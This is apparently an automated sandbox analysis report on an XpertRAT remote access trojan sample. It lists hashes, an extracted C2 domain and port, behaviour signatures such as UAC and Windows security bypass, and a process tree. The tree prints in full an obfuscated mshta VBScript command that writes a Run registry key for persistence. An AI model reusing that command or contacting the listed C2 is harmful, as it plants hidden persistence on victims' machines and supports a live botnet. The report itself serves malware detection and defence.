Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27/01/2025, 13:28

General

  • Target

    2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe

  • Size

    744KB

  • MD5

    6c6a9c70763f799ac9d4ca55a292c3f4

  • SHA1

    af4ebcfdd1624a077cd0f1a1c77f04076a974714

  • SHA256

    2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17

  • SHA512

    d21fc33c06169f58735333d95455636dfe0054021c884fa01df846d4bf0fd1085982475f47b0aba26ba782d66ce10317eadc34c6d3a28f8bd458c2ffda6231fc

  • SSDEEP

    12288:VzukkVr/MhE6JOA6lfHcb+L1LkUrzx0E+qKlR5yaMxTEaD:NhE6JOAiPVgUrCvR5yaMxTEaD

Malware Config

Extracted

Family

xpertrat

Version

3.1.9

Botnet

Group

C2

joeing.dnsfor.me:2011

Mutex

P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

  • XpertRAT Core payload 3 IoCs
  • Xpertrat family
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
    "C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4104
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\sprgekasser"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"",""REG_SZ"" : window.close")
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2372
    • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
      "C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4424
      • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
        "C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"
        3⤵
        • UAC bypass
        • Windows security bypass
        • Executes dropped EXE
        • Windows security modification
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:456
        • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
          C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
          4⤵
          • Adds policy Run key to start application
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1360

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe

    Filesize

    744KB

    MD5

    41116a2b3b3b0b088a773d7daa201e45

    SHA1

    c10e2a5e1f5278cb32772df1991d3a25dc2eeea8

    SHA256

    1ca110ac8fc54b08f016111bacb5590e7df1d00b10638a1e3690453630505c58

    SHA512

    dae78fd971904bcfc4e59f52be1caa7b6745c82f17b3beba727cd2b021babd72d2e8118b42e8ca697a383251e0c6e0e6560153e143cc6219e7ad7d9a0798270b

  • memory/456-17-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/456-19-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/456-33-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/1360-22-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

  • memory/1360-24-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

  • memory/1360-35-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

  • memory/4104-2-0x00000000779F1000-0x0000000077B11000-memory.dmp

    Filesize

    1.1MB

  • memory/4104-14-0x00000000779F1000-0x0000000077B11000-memory.dmp

    Filesize

    1.1MB